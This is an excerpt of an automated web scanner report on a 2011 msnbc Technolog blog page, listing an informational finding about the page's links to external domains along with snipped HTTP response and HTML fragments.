<div class="rawhtml_contents clearer clearfix rawhtml_BlogAuthorPromo"><a href="http://www.thecaseforpluto.com/" title="The Case for Pluto"><img src="http://www.thecaseforpluto.com/cover.jpg" width="85" height="129" align="left" border="0" style="padding:0 10px 10px 0;" /></a>Alan Boyle's first book tells the story of Pluto's ups and downs as well as the discoveries of other dwarf planets in our own solar system and even more alien worlds beyond. <a href="http://www.thecaseforpluto.com/" title="The Case for Pluto">Buy "The Case for Pluto" ...</a>
...[SNIP]...
<div class="avatar"><a href="http://wbenedetti.newsvine.com/"><img class="noborder" src="http://www.polls.newsvine.com/_vine/images/av/60x60/WBenedetti-689965150.jpg" width="60" height="60" /></a>
...[SNIP]...
<li class="follow winda benedetti on twitter"><a href="http://twitter.com/windabenedetti">follow Winda Benedetti on Twitter</a>
...[SNIP]...
<div class="avatar"><a href="http://toddkenreck.newsvine.com/"><img class="noborder" src="http://www.polls.newsvine.com/_vine/images/av/60x60/toddkenreck-1044151231.jpg" width="60" height="60" /></a>
...[SNIP]...
<li><a href="http://ingame.newsvine.com/">In-Game</a>
...[SNIP]...
<li class="todd kenreck on facebook"><a href="http://www.facebook.com/todd.kenreck">Todd Kenreck on facebook</a>
...[SNIP]...
<li class="todd kenreck on twitter"><a href="https://twitter.com/ToddKenreck">Todd Kenreck on twitter</a>
...[SNIP]...
<div class="avatar"><a href="http://athima-chansanchai.newsvine.com/"><img class="noborder" src="http://www.polls.newsvine.com/_vine/images/av/60x60/athima-chansanchai-1539646533.jpg" width="60" height="60" /></a>
...[SNIP]...
<li><a href="http://redtape.msnbc.com/">Red Tape Chronicles</a>
...[SNIP]...
<a href="http://www.msnbc.redacted/"><img src="http://lib.newsvine.com/chrome/abstractmartinblog/images/msnbc-logo.png" alt="msnbc.com" width="166" height="20"></a>
...[SNIP]...
<li>
                   <a href="http://privacy.microsoft.com/en-us/default.aspx?SU=http://msnbc.redacted/">MSN Privacy</a>
...[SNIP]...
<li>
                   <a href="http://help.live.com/help.aspx?project=tou&mkt=en-us">Legal</a>
...[SNIP]...
</div><link rel="stylesheet" type="text/css" href="http://lib.newsvine.com/Pierre/widgets/wetbar/wetbar.css">
<script type="text/javascript" language="JavaScript">
...[SNIP]...

22.344. http://technolog.msnbc.redacted/_news/2011/01/28/5942663-t-pains-facebook-tattoo-so-hardcore-its-hexacore/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://technolog.msnbc.redacted
Path:	/_news/2011/01/28/5942663-t-pains-facebook-tattoo-so-hardcore-its-hexacore/

Issue detail

The page was loaded from a URL containing a query string:

http://technolog.msnbc.redacted/_news/2011/01/28/5942663-t-pains-facebook-tattoo-so-hardcore-its-hexacore/?GT1=43001

The response contains the following links to other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js
http://alex-johnson.newsvine.com/
http://athima-chansanchai.newsvine.com/
http://biggie2221635.newsvine.com/
http://blogs.discovermagazine.com/badastronomy/
http://blogs.discovermagazine.com/cosmicvariance/
http://blogs.discovermagazine.com/loom/
http://blogs.nature.com/news/thegreatbeyond/
http://boyle.newsvine.com/
http://content.pulse360.com/42EBFC62-1F4E-11E0-AB70-41F5E4064C68
http://content.pulse360.com/517F9430-C0FA-11DF-831B-94A93FF5047F
http://curmudgeons.blogspot.com/
http://darthdon.newsvine.com/
http://dateline.msnbc.com/
http://davethedoubter.newsvine.com/
http://earthsky.org/
http://eurekalert.org/
http://hardball.msnbc.com/
http://helenaspopkin.newsvine.com/
http://help.live.com/help.aspx?project=tou&mkt=en-us
http://http/www.universetoday.com/
http://ingame.newsvine.com/
http://john875667.newsvine.com/
http://lib.newsvine.com/Pierre/widgets/wetbar/wetbar.css
http://lib.newsvine.com/chrome/abstractmartinblog/base.css?v=23247
http://lib.newsvine.com/chrome/abstractmartinblog/chrome.js?v=23247
http://lib.newsvine.com/chrome/abstractmartinblog/images/icons-email.png
http://lib.newsvine.com/chrome/abstractmartinblog/images/icons-feed.png
http://lib.newsvine.com/chrome/abstractmartinblog/images/msnbc-logo.png
http://lib.newsvine.com/chrome/abstractmartinblog/style.css?v=23247
http://lib.newsvine.com/chrome/technolog/style.css?v=23247
http://ljrhodes.newsvine.com/
http://log.newsvine.com/poke.gif?x=0|26&get=c5942663&rand=1645153984&do=msnbc.redacted&ad=53:9:80;44::;56:27:108;53:9:80;86:86:270;87:87:209;50::
http://malexj.tk/6M
http://malexj.wordpress.com/
http://michaelwann.newsvine.com/
http://minotown.newsvine.com/
http://msn.whitepages.com/
http://mtp.msnbc.com/
http://nasaengineer.com/
http://news.discovery.com/
http://news.sciencemag.org/scienceinsider/
http://nightly.msnbc.com/
http://planetary.org/blog
http://platform.twitter.com/widgets.js
http://privacy.microsoft.com/en-us/default.aspx?SU=http://msnbc.redacted/
http://rachel.msnbc.com/
http://redtape.msnbc.com/
http://redtape.newsvine.com/
http://science.slashdot.org/
http://seedmagazine.com/
http://spacefellowship.com/
http://suzanne-choney.newsvine.com/
http://technolog2.newsvine.com/
http://today.msnbc.com/
http://toddkenreck.newsvine.com/
http://trueslant.com/milesobrien/
http://tv.msnbc.com/
http://twitter.com/
http://twitter.com/HelenASPopkin
http://twitter.com/MichaelWann
http://twitter.com/helenaspopkin
http://twitter.com/share
http://twitter.com/windabenedetti
http://twitter.com/wjrothman
http://tyler.newsvine.com/
http://waynej.newsvine.com/
http://wbenedetti.newsvine.com/
http://www.bing.com/
http://www.bing.com/maps/default.aspx?FORM=MSNNAV
http://www.bing.com/shopping?FORM=SHOPH2
http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV
http://www.collectspace.com/
http://www.dailygrail.com/
http://www.delish.com/
http://www.everyblock.com/
http://www.facebook.com/HelenASPopkin
http://www.facebook.com/pages/manage/
http://www.facebook.com/plugins/like.php?layout=button_count&show_faces=false&width=90&action=like&colorscheme=light&href=http://www.facebook.com/pages/Technolog/108546889203630
http://www.facebook.com/plugins/like.php?layout=standard&show_faces=true&width=480&action=recommend&colorscheme=light&href=http://technolog.msnbc.redacted/_news/2011/01/28/5942663-t-pains-facebook-tattoo-so-hardcore-its-hexacore
http://www.facebook.com/todd.kenreck
http://www.geekpress.com/
http://www.habitablezone.com/space/
http://www.hobbyspace.com/
http://www.hotmail.com/
http://www.livescience.com/
http://www.nasaspaceflight.com/
http://www.nasawatch.com/
http://www.newsvine.com/
http://www.newsvine.com/_nv/cms/help/newUsers
http://www.newsvine.com/_nv/cms/info/privacyPolicy
http://www.outofthecradle.net/
http://www.polls.newsvine.com/_static/css/39f49614ef57bfa39918e852b69f13f139a7e311.css?v=23247
http://www.polls.newsvine.com/_static/css/e89cb27add8a8bec4ff014077d76236c84e0ee2e.css?v=23247
http://www.polls.newsvine.com/_static/js/895677dfabd5df38e5ee57c63c4a6f9ac2e2fff9.js?v=23247
http://www.polls.newsvine.com/_static/js/9d030b901f826a71aa88c354332b97d68143daaf.js?v=23247
http://www.polls.newsvine.com/_util/quicktags/v131.js?v=2
http://www.polls.newsvine.com/_util/tiny_mce/tinymce_3_3_9_2/tiny_mce.js
http://www.polls.newsvine.com/_vine/images/_/b_postcomment.gif
http://www.polls.newsvine.com/_vine/images/_/b_posting.gif
http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif
http://www.polls.newsvine.com/_vine/images/_/icon_stop_mini.gif
http://www.polls.newsvine.com/_vine/images/_/icon_track_mini.gif
http://www.polls.newsvine.com/_vine/images/__/spinner.gif
http://www.polls.newsvine.com/_vine/images/av/60x60/WBenedetti-689965150.jpg
http://www.polls.newsvine.com/_vine/images/av/60x60/alex-johnson-743865123.jpg
http://www.polls.newsvine.com/_vine/images/av/60x60/athima-chansanchai-1539646533.jpg
http://www.polls.newsvine.com/_vine/images/av/60x60/boyle-747955448.jpg
http://www.polls.newsvine.com/_vine/images/av/60x60/helenaspopkin-1308146463.jpg
http://www.polls.newsvine.com/_vine/images/av/60x60/michaelwann-318009268.jpg
http://www.polls.newsvine.com/_vine/images/av/60x60/redtape-920134022.jpg
http://www.polls.newsvine.com/_vine/images/av/60x60/suzanne-choney-604078999.jpg
http://www.polls.newsvine.com/_vine/images/av/60x60/toddkenreck-1044151231.jpg
http://www.polls.newsvine.com/_vine/images/av/60x60/wjrothman-1049670252.jpg
http://www.polls.newsvine.com/_vine/images/users/600/helenaspopkin/5942669.jpg
http://www.polls.newsvine.com/_vine/images/users/600/helenaspopkin/5942671.jpg
http://www.polls.newsvine.com/_vine/js/msnbc/s_code.js?v=23247
http://www.polls.newsvine.com/_vine/js/msnbc/std.js?v=23247
http://www.polls.newsvine.com/_vine/js/pierre?v=2643&lib=jquery&addwidgets=zinger,wetbar
http://www.popsci.com/
http://www.popularmechanics.com/
http://www.scidev.net/
http://www.scienceblog.com/cms/index.php
http://www.scienceblogs.com/
http://www.sciencenews.org/
http://www.scientificamerican.com/blog/observations/
http://www.signonsandiego.com/news/blogs/science-quest/
http://www.space.com/
http://www.spacedaily.com/
http://www.spacepolitics.com/
http://www.thecaseforpluto.com/
http://www.thecaseforpluto.com/cover.jpg
http://www.thespacereview.com/
http://www.transterrestrial.com/
http://www.twitter.com/MAlexJohnson
http://www.twitter.com/suzannechoney
http://www.unmannedspaceflight.com/
http://www.youtube.com/v/w0nFpwPuk8E&hl=en_US&fs=1
http://yui.yahooapis.com/combo?2.8.0r4/build/button/assets/skins/sam/button.css&2.8.0r4/build/container/assets/skins/sam/container.css
http://yui.yahooapis.com/combo?2.8.1/build/utilities/utilities.js&2.8.1/build/button/button-min.js&2.8.1/build/container/container-min.js&2.8.1/build/cookie/cookie-min.js&2.8.1/build/selector/selector-min.js&2.8.1/build/event-delegate/event-delegate-min.js&2.8.1/build/json/json-min.js
https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB
https://twitter.com/ToddKenreck
https://www.newsvine.com/_nv/accounts/msnbc/emailAlerts?affiliate=msnbc.redacted

Request

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Location: http://technolog.msnbc.redacted/_news/2011/01/28/5942663-t-pains-facebook-tattoo-so-hardcore-its-hexacore?GT1=43001
Content-Type: text/html
Cache-Control: max-age=298
Date: Sat, 29 Jan 2011 23:51:36 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 64820

<!DOCTYPE HTML>
<html lang="en"><head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="X-UA-Compatible" content="IE=8;IE=9" />
<title>Technolog - T-Pain's Face
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title="RSS" href="http://technolog.msnbc.redacted/_feeds/rss2/author" />
<link class="cpk_remote" rel="stylesheet" type="text/css" href="http://yui.yahooapis.com/combo?2.8.0r4/build/button/assets/skins/sam/button.css&2.8.0r4/build/container/assets/skins/sam/container.css" />
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://yui.yahooapis.com/combo?2.8.1/build/utilities/utilities.js&2.8.1/build/button/button-min.js&2.8.1/build/container/container-min.js&2.8.1/build/cookie/cookie-min.js&2.8.1/build/selector/selector-min.js&2.8.1/build/event-delegate/event-delegate-min.js&2.8.1/build/json/json-min.js"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_util/quicktags/v131.js?v=2"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_util/tiny_mce/tinymce_3_3_9_2/tiny_mce.js"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_vine/js/pierre?v=2643&lib=jquery&addwidgets=zinger,wetbar"></script>
<link class="cpk_static" rel="stylesheet" type="text/css" href="http://www.polls.newsvine.com/_static/css/39f49614ef57bfa39918e852b69f13f139a7e311.css?v=23247" />
<script class="cpk_static" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_static/js/9d030b901f826a71aa88c354332b97d68143daaf.js?v=23247"></script>
<link class="cpk_dynamic" rel="stylesheet" type="text/css" href="http://www.polls.newsvine.com/_static/css/e89cb27add8a8bec4ff014077d76236c84e0ee2e.css?v=23247" />
<script class="cpk_dynamic" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_static/js/895677dfabd5df38e5ee57c63c4a6f9ac2e2fff9.js?v=23247"></script>
<link class="cpk_chrome" rel="stylesheet" type="text/css" href="http://lib.newsvine.com/chrome/abstractmartinblog/base.css?v=23247" />
<link class="cpk_chrome" rel="stylesheet" type="text/css" href="http://lib.newsvine.com/chrome/abstractmartinblog/style.css?v=23247" />
<link class="cpk_chrome" rel="stylesheet" type="text/css" href="http://lib.newsvine.com/chrome/technolog/style.css?v=23247" />
<script class="cpk_chrome" language="javascript" type="text/javascript" src="http://lib.newsvine.com/chrome/abstractmartinblog/chrome.js?v=23247"></script>
...[SNIP]...
<div class="pokeDiv"><img id="poke" src="http://log.newsvine.com/poke.gif?x=0|26&get=c5942663&rand=1645153984&do=msnbc.redacted&ad=53:9:80;44::;56:27:108;53:9:80;86:86:270;87:87:209;50::" alt="" width="0" height="0" /></div>
...[SNIP]...
<li class="i1 hotmail"><a href="http://www.hotmail.com">Hotmail</a>
...[SNIP]...
<li class="i2 more">
               <a href="http://www.hotmail.com">More</a>
...[SNIP]...
<li class="i7"><a href="http://www.delish.com/">Delish</a>
...[SNIP]...
<li class="i9"><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li class="i14"><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a>
...[SNIP]...
<li class="i18"><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB" target="_blank">Feedback</a>
...[SNIP]...
<li class="i19"><a href="http://www.bing.com/maps/default.aspx?FORM=MSNNAV">Maps & Directions</a>
...[SNIP]...
<li class="i20"><a href="http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV ">Travel</a>
...[SNIP]...
<li id="bing" class="i3 bing"><a href="http://www.bing.com"><span>
...[SNIP]...
<li class="i2 show-today"><a href="http://today.msnbc.com/">TODAY</a></li>
           <li class="i3 show-nightly"><a href="http://nightly.msnbc.com/">Nightly News</a>
...[SNIP]...
<li class="i4 show-mtp"><a href="http://mtp.msnbc.com/">Meet the Press</a>
...[SNIP]...
<li class="i5 show-dateline"><a href="http://dateline.msnbc.com/">Dateline</a>
...[SNIP]...
<li class="i6 show-maddow"><a href="http://rachel.msnbc.com/">Maddow</a>
...[SNIP]...
<li class="i8 show-hardball"><a href="http://hardball.msnbc.com/">Hardball</a>
...[SNIP]...
<li class="i9 show-msnbc"><a href="http://tv.msnbc.com/">msnbc tv</a>
...[SNIP]...
<li class="i10 site-newsvine"><a href="http://www.newsvine.com/">Newsvine</a>
...[SNIP]...
<li class="i11 site-everyblock"><a href="http://www.everyblock.com/">EveryBlock</a>
...[SNIP]...
<li class="email_subscribe_option"><a href="https://www.newsvine.com/_nv/accounts/msnbc/emailAlerts?affiliate=msnbc.redacted"><img src="http://lib.newsvine.com/chrome/abstractmartinblog/images/icons-email.png" width="19" height="18" alt="Icons Email"> Receive e-mail updates</a>
...[SNIP]...
</div><a href="https://www.newsvine.com/_nv/accounts/msnbc/emailAlerts?affiliate=msnbc.redacted">change this</a>
...[SNIP]...
<div class="spinner hide"><img src="http://www.polls.newsvine.com/_vine/images/__/spinner.gif" width="16" height="16" alt="Loading" /> Saving...</div>
...[SNIP]...
<a href="http://technolog.msnbc.redacted/_feeds/rss2/author"><img src="http://lib.newsvine.com/chrome/abstractmartinblog/images/icons-feed.png" width="18" height="18" alt="Icons Feed"> Subscribe to RSS</a>
...[SNIP]...
<div class="vine-p vine_data_M2_LayoutPrinter vine_data_M2_FlexiblePrinter p-widgets_FBLike">
<iframe src="http://www.facebook.com/plugins/like.php?layout=button_count&show_faces=false&width=90&action=like&colorscheme=light&href=http://www.facebook.com/pages/Technolog/108546889203630" scrolling="no" frameborder="0" allowTransparency="true" style="border:none; overflow:hidden; width:90px; height:20px"></iframe>
...[SNIP]...

<script src="http://www.polls.newsvine.com/_vine/js/msnbc/std.js?v=23247"></script>
...[SNIP]...
</script><script src="http://www.polls.newsvine.com/_vine/js/msnbc/s_code.js?v=23247"></script>
...[SNIP]...
<div id="vine-inlinePhoto__5942669" data-contentId="5942669" class="inlinePhoto photo_portrait photo_align_block user_inline_photo" style="width:600px;"><img id="helenaspopkin/5942669.jpg" src="http://www.polls.newsvine.com/_vine/images/users/600/helenaspopkin/5942669.jpg" width="600" height="672" alt="" /><p class="photo_credit">
...[SNIP]...
<p>Anyhoo … T-Pain really likes Facebook too … at least his latest tattoo indicates such. The Grammy-winning hip-hop artist shared a picture of his new ink on Twitter today, <a href="http://twitter.com/#!/NBTPAIN/status/30855244816584704">with this explanation </a>
...[SNIP]...
<div id="vine-inlinePhoto__5942671" data-contentId="5942671" class="inlinePhoto photo_portrait photo_align_block user_inline_photo" style="width:238px;"><img id="helenaspopkin/5942671.jpg" src="http://www.polls.newsvine.com/_vine/images/users/600/helenaspopkin/5942671.jpg" width="238" height="320" alt="" />
...[SNIP]...
</param><embed src="http://www.youtube.com/v/w0nFpwPuk8E&hl=en_US&fs=1" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" width="600" height="429"></embed>
...[SNIP]...
<em>Helen A.S. Popkin writes about the Internet ... a lot. Follow her on <a href="http://twitter.com/helenaspopkin"><span>
...[SNIP]...
</a> and/or <a href="http://www.facebook.com/pages/manage/#!/pages/Helen-AS-Popkin/120508047967128"><span>
...[SNIP]...
<div class="tweetbutton"><a href="http://twitter.com/share" class="twitter-share-button" data-count="horizontal" data-via="msnbc_tech" data-related="breakingnews:The fastest breaking news on Twitter." data-url="http://technolog.msnbc.redacted/_news/2011/01/28/5942663-t-pains-facebook-tattoo-so-hardcore-its-hexacore" data-Text="T-Pain's Facebook tattoo so hardcore, it's hexacore!">Tweet</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
<div class="vine-p vine_data_M2_LayoutPrinter vine_data_M2_FlexiblePrinter p-widgets_FBLike">
<iframe src="http://www.facebook.com/plugins/like.php?layout=standard&show_faces=true&width=480&action=recommend&colorscheme=light&href=http://technolog.msnbc.redacted/_news/2011/01/28/5942663-t-pains-facebook-tattoo-so-hardcore-its-hexacore" scrolling="no" frameborder="0" allowTransparency="true" style="border:none; overflow:hidden; width:480px; height:70px"></iframe>
...[SNIP]...
<div class="normal"><a href="http://biggie2221635.newsvine.com/">biggie-2221635</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="newsvine"><a href="http://tyler.newsvine.com/">tyler</a>
...[SNIP]...
<div class="clearfix"><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /></div>
...[SNIP]...
<div class="normal"><a href="http://waynej.newsvine.com/">waynejohn</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://Davethedoubter.newsvine.com/">Dave the doubter</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://MInOTown.newsvine.com/">M In O Town</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://ljrhodes.newsvine.com/">L.J. Rhodes</a>
...[SNIP]...
<div class="clearfix"><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /></div>
...[SNIP]...
<div class="normal"><a href="http://John875667.newsvine.com/">John-875667</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://Darthdon.newsvine.com/">Darthdon</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="privacytext"><a href="http://www.newsvine.com/_nv/cms/info/privacyPolicy" target="_blank">Newsvine Privacy Statement</a></div><img class="postCommentImage" src="http://www.polls.newsvine.com/_vine/images/_/b_postcomment.gif" /><img class="postingCommentImage" src="http://www.polls.newsvine.com/_vine/images/_/b_posting.gif" /></div>
...[SNIP]...
<div class="newuser">As a new user, you may notice a few temporary content restrictions. <a href="http://www.newsvine.com/_nv/cms/help/newUsers" target="_blank">Click here for more info</a>
...[SNIP]...
<span><img src="http://www.polls.newsvine.com/_vine/images/_/icon_track_mini.gif" width="12" height="12" alt="Start Tracking" title="Add this article to your conversation tracker without commenting on it" />Start Tracking</span>
...[SNIP]...
<span><img src="http://www.polls.newsvine.com/_vine/images/_/icon_stop_mini.gif" width="10" height="10" alt="Stop Tracking" />Stop Tracking</span>
...[SNIP]...
</div><script src="http://content.pulse360.com/42EBFC62-1F4E-11E0-AB70-41F5E4064C68" type="text/javascript"></script>
...[SNIP]...
</div><script src="http://content.pulse360.com/517F9430-C0FA-11DF-831B-94A93FF5047F" type="text/javascript"></script>
...[SNIP]...
<div class="avatar"><a href="http://michaelwann.newsvine.com/"><img class="noborder" src="http://www.polls.newsvine.com/_vine/images/av/60x60/michaelwann-318009268.jpg" width="60" height="60" /></a>
...[SNIP]...
<li class="twitter"><a href="http://twitter.com/MichaelWann">Follow on Twitter</a>
...[SNIP]...
<div class="avatar"><a href="http://technolog2.newsvine.com/"><img class="noborder" src="http://www.polls.newsvine.com/_vine/images/av/60x60/wjrothman-1049670252.jpg" width="60" height="60" /></a>
...[SNIP]...
from Time and the NYT to the notorious tech blog Gizmodo, where he was features editor for three years. He is not an Apple fanboy, but sometimes he is mistaken for one. You can stalk him on Twitter at <a href="http://twitter.com/wjrothman">@wjrothman</a>
...[SNIP]...
<li class="twitter"><a href="http://twitter.com/wjrothman">Follow on Twitter</a>
...[SNIP]...
<div class="avatar"><a href="http://helenaspopkin.newsvine.com/"><img class="noborder" src="http://www.polls.newsvine.com/_vine/images/av/60x60/helenaspopkin-1308146463.jpg" width="60" height="60" /></a>
...[SNIP]...
<li class="twitter"><a href="http://twitter.com/HelenASPopkin">Follow on Twitter</a>
...[SNIP]...
<li class="facebook"><a href="http://www.facebook.com/HelenASPopkin">Become a fan on Facebook</a>
...[SNIP]...
<div class="avatar"><a href="http://suzanne-choney.newsvine.com/"><img class="noborder" src="http://www.polls.newsvine.com/_vine/images/av/60x60/suzanne-choney-604078999.jpg" width="60" height="60" /></a>
...[SNIP]...
<li class="twitter"><a href="http://www.twitter.com/suzannechoney">Follow on Twitter</a>
...[SNIP]...
<div class="avatar"><a href="http://alex-johnson.newsvine.com/"><img class="noborder" src="http://www.polls.newsvine.com/_vine/images/av/60x60/alex-johnson-743865123.jpg" width="60" height="60" /></a>
...[SNIP]...
<li><a href="http://malexj.wordpress.com/">Editor at Large</a>
...[SNIP]...
<li class="follow on twitter"><a href="http://www.twitter.com/MAlexJohnson">Follow on Twitter</a>
...[SNIP]...
<li class="follow on facebook"><a href="http://malexj.tk/6M">Follow on Facebook</a>
...[SNIP]...
<div class="avatar"><a href="http://redtape.newsvine.com/"><img class="noborder" src="http://www.polls.newsvine.com/_vine/images/av/60x60/redtape-920134022.jpg" width="60" height="60" /></a>
...[SNIP]...
<div class="avatar"><a href="http://boyle.newsvine.com/"><img class="noborder" src="http://www.polls.newsvine.com/_vine/images/av/60x60/boyle-747955448.jpg" width="60" height="60" /></a>
...[SNIP]...
<li><a href="http://blogs.discovermagazine.com/badastronomy/">Bad Astronomy</a>
...[SNIP]...
<li><a href="http://www.collectspace.com/">CollectSpace</a>
...[SNIP]...
<li><a href="http://blogs.discovermagazine.com/cosmicvariance/">Cosmic Variance</a>
...[SNIP]...
<li><a href="http://curmudgeons.blogspot.com/">Curmudgeons Corner</a>
...[SNIP]...
<li><a href="http://news.discovery.com/">Discovery News</a>
...[SNIP]...
<li><a href="http://www.dailygrail.com/">The Daily Grail</a>
...[SNIP]...
<li><a href="http://earthsky.org/">EarthSky</a></li><li><a href="http://www.geekpress.com/">GeekPress</a></li><li><a href="http://www.habitablezone.com/space/">Habitable Zone</a>
...[SNIP]...
<li><a href="http://www.hobbyspace.com/">HobbySpace Log</a>
...[SNIP]...
<li><a href="http://www.livescience.com/">LiveScience</a>
...[SNIP]...
<li><a href="http://blogs.discovermagazine.com/loom/">The Loom</a></li><li><a href="http://www.nasawatch.com/">NASA Watch</a></li><li><a href="http://www.nasaspaceflight.com/">NASA Spaceflight</a>
...[SNIP]...
<li><a href="http://www.outofthecradle.net/">Out of the Cradle</a>
...[SNIP]...
<li><a href="http://www.scidev.net/">SciDev.net</a></li><li><a href="http://www.scienceblog.com/cms/index.php">Science Blog</a>
...[SNIP]...
<li><a href="http://www.scienceblogs.com/">ScienceBlogs</a>
...[SNIP]...
<li><a href="http://www.signonsandiego.com/news/blogs/science-quest/">Science Quest</a>
...[SNIP]...
<li><a href="http://www.scientificamerican.com/blog/observations/">SciAm Observations</a>
...[SNIP]...
<li><a href="http://seedmagazine.com/">Seed Magazine</a>
...[SNIP]...
<li><a href="http://science.slashdot.org">Slashdot Science</a>
...[SNIP]...
<li><a href="http://www.space.com/">Space.com</a></li><li><a href="http://www.spacedaily.com/">Spaceflight Now</a>
...[SNIP]...
<li><a href="http://spacefellowship.com/">Space Fellowship</a>
...[SNIP]...
<li><a href="http://www.thespacereview.com/">The Space Review</a>
...[SNIP]...
<li><a href="http://www.transterrestrial.com/">Transterrestrial Musings</a>
...[SNIP]...
<li><a href="http://http://www.universetoday.com/">Universe Today</a>
...[SNIP]...
<li><a href="http://www.unmannedspaceflight.com">Unmanned Spaceflight</a>
...[SNIP]...
<li><a href="http://trueslant.com/milesobrien/">Uplink by Miles O'Brien</a>
...[SNIP]...
<li><a href="http://planetary.org/blog">Planetary Society Blog</a>
...[SNIP]...
<li><a href="http://www.sciencenews.org/">Science News</a>
...[SNIP]...
<li><a href="http://www.popularmechanics.com/">Popular Mechanics</a>
...[SNIP]...
<li><a href="http://www.popsci.com/">Popular Science</a>
...[SNIP]...
<li><a href="http://news.sciencemag.org/scienceinsider/">Science Insider</a>
...[SNIP]...
<li><a href="http://nasaengineer.com/">NASAEngineer.com</a>
...[SNIP]...
<li><a href="http://eurekalert.org/">EurekAlert</a></li><li><a href="http://blogs.nature.com/news/thegreatbeyond/">Nature: The Great Beyond</a>
...[SNIP]...
<li><a href="http://www.spacedaily.com/">Space Daily</a>
...[SNIP]...
<li><a href="http://www.spacepolitics.com">Space Politics</a>
...[SNIP]...
<div class="rawhtml_contents clearer clearfix rawhtml_BlogAuthorPromo"><a href="http://www.thecaseforpluto.com/" title="The Case for Pluto"><img src="http://www.thecaseforpluto.com/cover.jpg" width="85" height="129" align="left" border="0" style="padding:0 10px 10px 0;" /></a>Alan Boyle's first book tells the story of Pluto's ups and downs as well as the discoveries of other dwarf planets in our own solar system and even more alien worlds beyond. <a href="http://www.thecaseforpluto.com/" title="The Case for Pluto">Buy "The Case for Pluto" ...</a>
...[SNIP]...
<div class="avatar"><a href="http://wbenedetti.newsvine.com/"><img class="noborder" src="http://www.polls.newsvine.com/_vine/images/av/60x60/WBenedetti-689965150.jpg" width="60" height="60" /></a>
...[SNIP]...
<li class="follow winda benedetti on twitter"><a href="http://twitter.com/windabenedetti">follow Winda Benedetti on Twitter</a>
...[SNIP]...
<div class="avatar"><a href="http://toddkenreck.newsvine.com/"><img class="noborder" src="http://www.polls.newsvine.com/_vine/images/av/60x60/toddkenreck-1044151231.jpg" width="60" height="60" /></a>
...[SNIP]...
<li><a href="http://ingame.newsvine.com/">In-Game</a>
...[SNIP]...
<li class="todd kenreck on facebook"><a href="http://www.facebook.com/todd.kenreck">Todd Kenreck on facebook</a>
...[SNIP]...
<li class="todd kenreck on twitter"><a href="https://twitter.com/ToddKenreck">Todd Kenreck on twitter</a>
...[SNIP]...
<div class="avatar"><a href="http://athima-chansanchai.newsvine.com/"><img class="noborder" src="http://www.polls.newsvine.com/_vine/images/av/60x60/athima-chansanchai-1539646533.jpg" width="60" height="60" /></a>
...[SNIP]...
<li><a href="http://redtape.msnbc.com/">Red Tape Chronicles</a>
...[SNIP]...
<a href="http://www.msnbc.redacted/"><img src="http://lib.newsvine.com/chrome/abstractmartinblog/images/msnbc-logo.png" alt="msnbc.com" width="166" height="20"></a>
...[SNIP]...
<li>
                   <a href="http://privacy.microsoft.com/en-us/default.aspx?SU=http://msnbc.redacted/">MSN Privacy</a>
...[SNIP]...
<li>
                   <a href="http://help.live.com/help.aspx?project=tou&mkt=en-us">Legal</a>
...[SNIP]...
</div><link rel="stylesheet" type="text/css" href="http://lib.newsvine.com/Pierre/widgets/wetbar/wetbar.css">
<script type="text/javascript" language="JavaScript">
...[SNIP]...

22.345. http://technolog.msnbc.redacted/_news/2011/01/28/5942663-t-pains-facebook-tattoo-so-hardcore-its-hexacore/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://technolog.msnbc.redacted
Path:	/_news/2011/01/28/5942663-t-pains-facebook-tattoo-so-hardcore-its-hexacore/

